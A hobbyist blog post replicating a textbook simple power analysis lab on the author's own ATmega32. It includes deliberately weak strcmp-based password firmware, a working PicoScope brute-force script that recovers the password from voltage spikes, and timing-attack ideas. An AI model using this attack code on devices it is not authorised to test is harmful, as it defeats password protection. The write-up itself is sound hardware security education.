SPA Attack Experiment 1

In late 2021 a book named “Hardware Hacking Handbook” was published. I don’t remember exactly how I came across it, but after checking the table of contents and hearing feedback from a few friends, I decided to buy it. I skimmed the contents and stumbled on chapter 9, which includes a simple power analysis lab experiment. It’s an introduction to power analysis, and I was curious to try it in practice. So why not write about my experience replicating that lab?

During high school and my first university years, I spent some time playing with Atmel microcontrollers. Even though I’ve been a bit distant from this scene since then, I’ve followed some of the Arduino evolution. Thus, the lab apparatus wasn’t entirely new to me, but the experiment was!

Scenario

The lab target is a microcontroller that asks for a password over a serial port. The attack observes the noise on the power supply and uses it to learn the correct password. This type of attack is not new; according to the book, it dates back to the late ’90s, in the context of side-channel attacks on cryptography. However, the proliferation of microcontrollers and computers around us is likely to make these attacks increasingly common.

Power Analysis

As mentioned, the attack relies on analyzing the power consumption signal of a target device using a reasonably precise probe. One of the easiest ways of doing this (although there are others) is to place a shunt resistor between the target and the power source, as shown in the following drawing:

We then measure the voltage drop in the shunt resistor (Rs), and by Ohm’s law, we can get the current flowing into the target:

To avoid using a differential oscilloscope, which is more expensive, one could measure the potential at each end of the resistor and subtract the two to get the voltage drop. This can be simplified further by assuming that the voltage source (Vcc) is ideal and constant: we use a single probe to measure the voltage from the resistor’s negative node (V-) to ground, and subtract it from the ideal Vcc:

So, the current consumption analysis can be done by capturing the voltage at the negative node of the resistor. We’d expect that this voltage would show some differences when the correct character of the password is used compared to incorrect password characters.
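
As a minimal sketch of the single-probe simplification above, the target current can be estimated from the voltage at the low side of the shunt. The function name, the 4.5 V supply, and the 10 ohm shunt are illustrative assumptions, not values from this lab.

```python
def shunt_current(v_minus, vcc=4.5, r_shunt=10.0):
    """Estimate the target current (in amperes) from the shunt's low-side voltage.

    Assumes an ideal, constant Vcc, so the drop across the shunt is Vcc - V-.
    The default vcc and r_shunt are hypothetical example values.
    """
    if r_shunt <= 0:
        raise ValueError("shunt resistance must be positive")
    return (vcc - v_minus) / r_shunt


# A 50 mV drop across a 10 ohm shunt corresponds to roughly 5 mA.
print(shunt_current(4.45))
```

In practice only the variations of this value matter for the attack, which is why an AC-coupled capture of V- is enough.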

Simplifying

Measuring the current consumption is very reliable and should give the most accurate results. Alternatively, we can measure the voltage variations caused by small, fast changes in the current drawn by the target. This is only possible because real-world power sources are not ideal: they take time to restore the voltage after a change in current draw. That’s one of the reasons decoupling capacitors are used on the power rails. They help keep the voltage as stable as possible.

That said, I won’t be measuring the current variations but instead voltage source noise. We need to get rid of any capacitor on the power source rails to do this. Initially, I was using the STK500 programmer board with external Vtarget, but I missed that even this rail was connected to some smoothing capacitors. Thus, any voltage noise information was being wiped by the capacitors.

Now, we need to power the target somehow. Without capacitors on the power line, switching converters (buck, boost, and variants) would inject unwanted noise into our captured signal. Alternatively, we could use a linear voltage regulator (with lower noise), but I had none at hand.

So the solution I used was a cleaner power supply... and what’s the most basic low-noise power supply we know? A battery. So I connected three AAA cells in series to get around 4.5V, which was sufficient to power my target microcontroller.

Lab Preparation

I used the following parts:

Digital Scope (I used PicoScope 2406B, 1GS/s, 32MS)
ATmega32 microcontroller
USB to Serial converter (FTDI)
3xAAA power cells
AVR programmer board (STK500, but any will do)
Breadboard and a few wires

The lab setup is basic and described in the following diagram:

After mounting this setup, it looks like the following picture (the power from power cells is disconnected just to avoid wasting battery):

Before we can perform the experiments on noise analysis, we need to prepare the target. That’s described in the next section.

Target Software

I’ve used the same sample code as the one from the book with a few changes:

Removed the random delays;
Added code to drive the trigger pin low right after the comparison.

Since it’s my first experiment, I wanted to confirm I was seeing the signal noise at the right time and not, for example, missing data because I didn’t capture enough time. Even though we shouldn’t have these shortcuts in a realistic scenario, other hacks can be done to help overcome these limitations (some ideas are shared in the end).

The code used for the target was the following (based on code from the book):

// Trigger is PB0 (pin 1)
int triggerPin = PB0;
String known_passwordstr = String("ilovecheese");
String input_passwordstr;

char input_password[20];
char tempchr;
int index;

// the setup routine runs once when you press reset:
void setup() {
  // initialize serial communication at 9600 bits per second:
  Serial.begin(9600);
  pinMode(triggerPin, OUTPUT);
  tempchr = '0';
  index = 0;
}

// the loop routine runs over and over again forever:
void loop() {
  //Wait a little bit after startup & clear everything
  digitalWrite(triggerPin, LOW);
  delay(250);
  Serial.flush();
  Serial.write("Enter Password:");
  // wait for last character
  while ((tempchr != '\n') && (index < 19)) {
    if (Serial.available() > 0) {
      tempchr = Serial.read();
      input_password[index++] = tempchr;
    }
  }
  // Null terminate and strip non-characters
  input_password[index] = '\0';
  input_passwordstr = String(input_password);
  input_passwordstr.trim();
  index = 0;
  tempchr = 0;
  digitalWrite(triggerPin, HIGH);
  if (input_passwordstr == known_passwordstr) {
    digitalWrite(triggerPin, LOW);
    Serial.write("Password OK\n");
  } else {
    digitalWrite(triggerPin, LOW);
    //Delay up to 500ms randomly
    //delay(random(500));
    Serial.write("Password Bad\n");
  }
}

It’s worth mentioning that the password comparison line calls String.equals(), whose code is the following (taken from the Arduino core’s String implementation):

...
unsigned char String::equals(const String &s2) const
{
  return (len == s2.len && compareTo(s2) == 0);
}
...

It first compares the lengths of both strings, then it calls the compareTo function. The latter then uses strcmp, which is known to be inadequate for comparing passwords. This means that one part of the attack (not explored in this post) is to find the correct password size.
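
To illustrate why strcmp is a poor fit for passwords, here is a small Python model of its early-exit loop. It is only a sketch of the behavior (the real code is the AVR assembly shown in Appendix B), and the function name is made up for this example.

```python
def strcmp_iterations(guess, secret):
    """Count how many character pairs an early-exit, strcmp-style loop examines."""
    count = 0
    # C strings carry a NUL terminator, so model it explicitly.
    for g, s in zip(guess + "\0", secret + "\0"):
        count += 1
        if g != s or s == "\0":
            break
    return count


secret = "ilovecheese"
for guess in ("aaaaaaaaaaa", "iaaaaaaaaaa", "ilaaaaaaaaa"):
    print(guess, strcmp_iterations(guess, secret))
# aaaaaaaaaaa 1
# iaaaaaaaaaa 2
# ilaaaaaaaaa 3
```

Each additional correct leading character costs one more loop iteration, and that extra work is what leaks through timing and power.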

Refer to Appendix A for information on how I programmed the target. I felt it was a bit off-topic to include in the main text. Once the target is programmed, we’re ready to do the first tests.

First tests and results...

I’ve used a Linux serial client (screen, minicom, etc.) to test if the target is working as expected. To communicate with the target, we need to ensure the baud rate is set to 9600. Then I typed a few characters until the password buffer was filled and waited for the response.

Once I verified that the serial communication was working as expected, I made the first captures from the oscilloscope. I’ve used channel A for the voltage noise capture (AC mode, 100mV, 2u to 5u) and channel B for the trigger (DC mode, 10V, 2V trigger on rising edge).

The following graph shows the voltage noise for two password attempts: aaaaaaaaaaa (represented by “V(a)”) and iaaaaaaaaaa (represented by “V(i)”). I’ve included the trigger signals, which allow us to see approximately when the comparison ends.

To avoid having too much information in the time graph, I cropped everything before 16us. Both signals are very similar from the trigger and start of the capture until around 18us. The grid spacing is one period of the 8MHz target clock (125ns), which is also the instruction cycle period (most of the target instructions take a single cycle). From this preliminary time graph, we can already make a few comments.

It was surprising to me to find that the noise signals are very similar for the same internal target behavior. I was expecting more noise, more differences between the signals!
Even though we sent 11 characters, we know that the comparison ends at the first differing character. This means the graph won’t show voltage noise for the comparison of every character, and we have to guess the password one character at a time.
We can see that the trigger goes low later for the iaaaaaaaaaa password, which is consistent with a string comparison that went one character further in the target. The offset suggests that it takes around 8 clock cycles per compared character.
The exit path of the comparison (comparison function return and trigger switch) should use similar instructions. Hence, we can see two identical voltage signals but having a time offset ...

Can you spot where the string comparison deviates? It seems to be right after 18us, at the C1 mark in the following time chart.

We can see that the pair of spikes is lower when the password character is correct. To help confirm this hypothesis, we can look at the signals for all the other wrong characters (a-z except i), and see that the behavior is the same: they all have a pair of spikes above 2V in this time region.

Moving to the next character, we have the exact same behavior as shown in the following graph: approximately 8 clock cycles after the first comparison (in C2), we see the two distinct spikes again:

To be more confident that these spikes are related to the comparison, we can check in the assembly listing whether the number of cycles between two character comparisons is around 8. Refer to Appendix B for this analysis.

To implement a brute force algorithm, we should look for data points above ~2V at specific periods in time, given by t, for the particular character index n, given the target clock period C:
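
Written out so that it matches the window computed by test_capture in the script that follows (with t_0 being the point around 18us where the first comparison showed up in my captures, and 8 being the cycles per compared character), the relation would be:

```latex
t_n = t_0 + 8\,C\,n, \qquad C = \frac{1}{8\ \mathrm{MHz}} = 0.125\ \mu\mathrm{s}, \qquad t_0 \approx 18\ \mu\mathrm{s}
```

With these values each character lands 1us after the previous one, and the script inspects the interval from t_n to t_n + 2C.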

I’ve used the following Python script to programmatically brute-force the password.

# spacode_crack.py, based on scripts from the book.
import serial
import time
# numpy is needed for the normalization of the captured data below
import numpy as np
#picoscope module from https://github.com/colinoflynn/pico-python
from picoscope import ps2000a
import string
import sys

def fill_pass(pw):
    if len(pw) < 11:
        return pw + "a"*(11 - len(pw))
    else:
        return pw

def build_pass(cur_pw, idx):
    return fill_pass(cur_pw + string.ascii_lowercase[idx])

V_THRESHOLD=2.1
def test_capture(data, cur_n, sample_period):
    C=1/(8e6)*1e6;
    idx_low = round((18+8*C*cur_n)/(sample_period*1e6))
    idx_high = round((18+8*C*cur_n + 2*C)/(sample_period*1e6))

    for i in range(idx_low,idx_high):
        if data[i] > V_THRESHOLD:
            return False

    # We had no voltage peaks related to different character, means this is potentially the correct one.
    return True

#Adjust serial port as needed
try:
    ser = serial.Serial(
        port='/dev/ttyUSB0',
        baudrate=9600,
        timeout=0.500
    )
    ps = ps2000a.PS2000a()
    print("Found the following picoscope:")
    print(ps.getAllUnitInfo())

    # Need at least 30us from trigger (8MHz ATMEL)
    obs_duration = 35E-6

    # Sample at least 5000 points within that window
    sampling_interval = obs_duration / 5000

    # Cut-off for HP filter
    freq1 = 400e3
    # Cut-off for LP filter
    freq2 = 16e6

    # Turn channels C and D off
    ps.setChannel('C', enabled=False)
    ps.setChannel('D', enabled=False)

    # Configure timebase
    (actualSamplingInterval, nSamples, maxSamples) = \
    ps.setSamplingInterval(sampling_interval, obs_duration)
    print("Sampling interval = %f us" % (actualSamplingInterval * nSamples * 1E6))

    # Channel B is the trigger
    ps.setChannel('B', 'DC', 10.0, 0.0, enabled=True, BWLimited=True)
    ps.setSimpleTrigger('B', 2.0, 'Rising', delay=10, timeout_ms=5000, enabled=True)

    # 1V range on channel A, AC coupled, bandwidth limit enabled
    ps.setChannel('A', 'AC', 1, 0.0, enabled=True, BWLimited=True)

    data_list = []
    cur_pass = ""
    cur_n = 0

    #Clear system
    ser.write(("abcde\n").encode("utf-8"))
    ser.read(128)

    while True:
        # Try next character
        found = False
        for idx in range(len(string.ascii_lowercase)):
            pw_test = build_pass(cur_pass, idx)
            #print("Testing password: %s" % pw_test)
            ps.runBlock()
            time.sleep(0.05)

            ser.write((pw_test + "\n").encode("utf-8"))
            ps.waitReady()
            r=ser.read(128)
            #print("Got response: %s" % r)
            if b'Password OK' in r:
                print("Found password: " + pw_test)
                sys.exit(0)

            data = ps.getDataV('A', nSamples, returnOverflow=False)
            data = -1.0 * (data - np.mean(data)) / np.std(data)
            if test_capture(data, cur_n, actualSamplingInterval) == True:
                found = True
                cur_pass = cur_pass + string.ascii_lowercase[idx]
                cur_n += 1
                print("Current password: " + cur_pass)
                break

            # Continue trying another character.
        if not found:
            print("Error: failed to find the correct character at offset %d!" % cur_n)
            sys.exit(-1)

finally:
    #Always close off things
    ser.close()
    ps.stop()
    ps.close()

After some trial and error, the output was:

Found the following picoscope:
DriverVersion                 : PS2000A Linux Driver, 2.1.78.3011
...
timebase = 2
timebase_dt = 4e-09
noSamples = 8750
Sampling interval = 35.000000 us
Current password: i
Current password: il
Current password: ilo
Current password: ilov
Current password: ilove
Current password: ilovec
Current password: ilovech
Current password: iloveche
Current password: ilovechee
Current password: ilovechees
Found password: ilovecheese
$

It’s not printing all the attempts, but you can easily enable that. I had to run it a few times (3 to 4) until it recovered the complete password. The code is very simple and doesn’t use any technique to be more tolerant of electrical errors and deviations. For example, we could average several captures of the same character attempt instead of relying on a single capture.
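
The averaging idea could look roughly like the sketch below. It is not part of the script I ran: the helper names and the sample values are made up, and only the 2.1 threshold is borrowed from V_THRESHOLD above.

```python
def average_traces(traces):
    """Point-by-point mean of several equally long captures."""
    if not traces:
        raise ValueError("need at least one trace")
    length = len(traces[0])
    if any(len(t) != length for t in traces):
        raise ValueError("all traces must have the same length")
    return [sum(samples) / len(traces) for samples in zip(*traces)]


def has_spike(trace, idx_low, idx_high, threshold=2.1):
    """True if any sample in [idx_low, idx_high) exceeds the threshold."""
    return any(v > threshold for v in trace[idx_low:idx_high])


# Three hypothetical captures of the same guess. The glitch in the second
# one would fool a single-shot check, but not the averaged trace.
captures = [
    [0.1, 0.2, 0.1, 0.0],
    [0.0, 2.5, 0.2, 0.1],
    [0.2, 0.1, 0.0, 0.1],
]
avg = average_traces(captures)
print(has_spike(captures[1], 0, 4))  # True
print(has_spike(avg, 0, 4))          # False
```

The trade-off is speed: every extra capture per guess multiplies the number of password attempts sent to the target.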

Final Words

This experiment was just a proof-of-concept: a few simplifications were used, deviating a bit from real-world scenarios. For instance, it wasn’t described how we could find the correct password size. There is a trigger signal to help know when the password comparison starts. I also used this signal to locate the end of the comparison more accurately, even though this information won’t be used in the brute-force script.

However, overcoming these difficulties shouldn’t be impossible either. There are always techniques and little hacks that can help. I can think of the following approaches for these two problems:

The trigger signal is used to know when the comparison is about to start. Without it, we still know that as soon as we send the newline that ends the password, the target receives that character and compares the password. We would be capturing the signal a bit early and would probably need to extend the capture period until we learn where the comparison is made.

I think a timing attack could be used to find the correct password length. When the guess has the correct length, the code calls strcmp, which delays the “Password Bad” response. By comparing the “Password Bad” response times, it might be possible to tell when the correct password size is used.
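
A rough sketch of how such timing measurements could be evaluated is shown below. I have not tried this on the target: the function name and the timing values are invented for illustration, and how the response times are measured is left out. The extra strcmp time is only a few clock cycles, so timing the serial reply from the PC is probably too coarse and the scope would likely be needed.

```python
from statistics import median


def guess_length(timings):
    """Return the candidate length whose median response time is the largest.

    timings maps a candidate password length to a list of measured
    response times in seconds.
    """
    if not timings:
        raise ValueError("no measurements")
    return max(timings, key=lambda n: median(timings[n]))


# Made-up numbers for illustration only: length 11 answers slightly later.
fake_timings = {
    10: [0.01002, 0.01001, 0.01003],
    11: [0.01004, 0.01005, 0.01004],
    12: [0.01001, 0.01002, 0.01002],
}
print(guess_length(fake_timings))  # 11
```

Using the median rather than the mean keeps a single slow outlier from deciding the result.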

Nevertheless, it was a fun challenge, and I look forward to doing other hardware security experiments.

Cheers!

Appendix A

Preparing the Target

First we need to install the Arduino core for the corresponding chip model. Arduino does not directly support all Atmel chips. Fortunately, the community has ported the Arduino core to many other Atmel chips, including those I had kept in my electronics parts boxes since my university years. I had several spare microcontrollers, but the one that I found to be working was an ATmega32.

To find an Arduino core for this chip, a quick web search leads us to MightyCore:

https://github.com/MCUdude/MightyCore

We first add this core index URL to the local Arduino configuration:

$ arduino-cli config add board_manager.additional_urls \
https://mcudude.github.io/MightyCore/package_MCUdude_MightyCore_index.json

Now we refresh the index with:

$ arduino-cli core update-index
Updating index: package_index.json downloaded                                                                                                                
Updating index: package_index.json.sig downloaded                                                                                                            
Updating index: package_drazzy.com_index.json downloaded                                                                                                     
Updating index: package_MCUdude_MightyCore_index.json downloaded

Let’s confirm we now have support for Atmega32 with:

$ arduino-cli core search atmega32
ID                   Version Name                    
atmel-avr-xminis:avr 0.6.0   Atmel AVR Xplained-minis
MightyCore:avr       2.1.3   MightyCore

We request Arduino to download the core stuff with:

$ arduino-cli core install MightyCore:avr
Tool arduino:[email protected] already installed
Tool arduino:[email protected] already installed
Tool arduino:[email protected] already installed
Downloading packages...
MightyCore:avr@2.1.3 downloaded
Installing platform MightyCore:avr@2.1.3...
Configuring platform....
Platform MightyCore:avr@2.1.3 installed

I didn’t need to install the bootloader separately because I use ICSP to program the microcontroller directly. When we use the arduino-cli compile/upload commands, the bootloader is already included in the binary, as will be shown next.

Compiling

First we grab the Lab1 code from the Hardware Hacking Handbook and put it in an Arduino source code file (I called mine PsaSketch).

Now we run the arduino-cli command to compile, providing the chip information:

$ arduino-cli compile -b MightyCore:avr:32:clock=8MHz_internal PsaSketch.ino

We’re ready to upload the code to the chip.

Uploading Code

You can use any programmer you prefer; I’m just sharing what I used, an STK500. I don’t think it’s a very commonly used board nowadays, and it’s probably easier to use a USBasp or an Arduino as ISP. But it really doesn’t matter as long as you can program the chip.

Since I’m using the STK500 to program the chip, the following description only applies if you’re using the same board; otherwise, you may skip ahead to the upload command. I have to connect the two headers, ISP6PIN and SPROG3 (the red one, where the ATmega32 is plugged in), as shown with the arrow in the following picture:

The square highlight marks the connection for the spare RS232 port, and the circle highlight marks the connection for the “trigger” LED (PB0).

Now that the board is ready, we can call the Arduino cli tool to upload the binary:

$ arduino-cli upload -b MightyCore:avr:32:clock=8MHz_internal \
-P stk500 -p /dev/ttyUSB0 -v .
...
avrdude: Version 6.3-20201216
         Copyright (c) 2000-2005 Brian Dean, http://www.bdmicro.com/
         Copyright (c) 2007-2014 Joerg Wunsch

...
         Using Port                    : /dev/ttyUSB0
         Using Programmer              : stk500
         AVR Part                      : ATmega32
         Chip Erase delay              : 9000 us
         PAGEL                         : PD7
         BS2                           : PA0
         RESET disposition             : dedicated
         RETRY pulse                   : SCK
         serial program mode           : yes
         parallel program mode         : yes
         Timeout                       : 200
         StabDelay                     : 100
         CmdexeDelay                   : 25
         SyncLoops                     : 32
         ByteDelay                     : 0
         PollIndex                     : 3
         PollValue                     : 0x53
         Memory Detail                 :

                                  Block Poll               Page                       Polled
           Memory Type Mode Delay Size  Indx Paged  Size   Size #Pages MinW  MaxW   ReadBack
           ----------- ---- ----- ----- ---- ------ ------ ---- ------ ----- ----- ---------
           eeprom         4    10    64    0 no       1024    4      0  9000  9000 0xff 0xff
           flash         33     6    64    0 yes     32768  128    256  4500  4500 0xff 0xff
           lfuse          0     0     0    0 no          1    0      0  2000  2000 0x00 0x00
           hfuse          0     0     0    0 no          1    0      0  2000  2000 0x00 0x00
           efuse          0     0     0    0 no          0    0      0     0     0 0x00 0x00
           lock           0     0     0    0 no          1    0      0  2000  2000 0x00 0x00
           signature      0     0     0    0 no          3    0      0     0     0 0x00 0x00
           calibration    0     0     0    0 no          4    0      0     0     0 0x00 0x00

         Programmer Type : STK500V2
         Description     : Atmel STK500
         Programmer Model: STK500
         Hardware Version: 2
         Firmware Version Master : 2.10
         Topcard         : Unknown
         Vtarget         : 5.1 V
         SCK period      : 35.3 us
         Varef           : 3.2 V
         Oscillator      : 3.686 MHz

avrdude: AVR device initialized and ready to accept instructions

Reading | ################################################## | 100% 0.01s

avrdude: Device signature = 0x1e9502 (probably m32)
avrdude: NOTE: "flash" memory has been specified, an erase cycle will be performed
         To disable this feature, specify the -D option.
avrdude: erasing chip
avrdude: reading input file "/tmp/arduino-sketch-AFA799AD3D8937B186F6188F7AC20AAA/PsaSketch.ino.with_bootloader.hex"
avrdude: writing flash (32768 bytes):

Writing | ################################################## | 100% 6.97s

avrdude: 32768 bytes of flash written

avrdude done.  Thank you.

As soon as we upload the code, we can see the LED light up (the code on the chip starts running right away). This happens because the VTARGET jumper on this board is shorted, so we’re powering the chip directly from the STK500.

Appendix B

Assembly Instructions

The code that compares the characters can be analyzed in the disassembly of the target binary, in the strcmp function:

strcmp():
    102c:       fb 01           movw    r30, r22       ; Z=r31:r30
    102e:       dc 01           movw    r26, r24       ; X=r27:r26
    1030:       8d 91           ld      r24, X+        ; r24=X, X+=1 (2C)
    1032:       01 90           ld      r0, Z+         ; r0=Z, Z+=1 (2C)
    1034:       80 19           sub     r24, r0        ; r24-=r0 (1C)
    1036:       01 10           cpse    r0, r1         ; if r0 == 0 ? (!1C,2C)
    1038:       d9 f3           breq    .-10           ; 0x1030 <strcmp+0x4>
    103a:       99 0b           sbc     r25, r25       ; r25=r25-r25=0
    103c:       08 95           ret

If we trace one loop iteration starting from the cpse instruction, for a character that matches, we count 8 clock cycles:

cpse: since r0 is not the terminating zero, nothing is skipped, so it executes the next instruction and consumes one clock cycle;
the next instruction is breq. cpse does not change the status flags, so breq still tests the zero flag left by sub; it is taken whenever the two characters were equal, and a taken branch takes two clock cycles;
then, two ld instructions that take four clock cycles in total;
the subtraction, which takes one clock cycle;
...and we reach the cpse instruction again, after 8 clock cycles.
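
The tally above can be double-checked with a few lines of Python. The per-instruction cycle counts are the ones annotated in the listing; the dictionary and variable names are just for this sketch.

```python
# Cycles per instruction for one loop iteration in which the characters match.
LOOP_CYCLES = {
    "ld r24, X+": 2,
    "ld r0, Z+": 2,
    "sub r24, r0": 1,
    "cpse r0, r1 (no skip)": 1,
    "breq (taken)": 2,
}
F_CPU_HZ = 8_000_000  # internal 8MHz clock selected when compiling the sketch

cycles = sum(LOOP_CYCLES.values())
# Multiply before dividing to keep the arithmetic exact.
period_us = cycles * 1e6 / F_CPU_HZ
print(cycles, period_us)  # 8 1.0
```

So each matched character should shift the comparison by about 1us, which agrees with the spacing between the C1 and C2 marks in the captures.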

References

https://learn.sparkfun.com/tutorials/installing-an-arduino-bootloader/all

https://docs.arduino.cc/built-in-examples/arduino-isp/ArduinoToBreadboard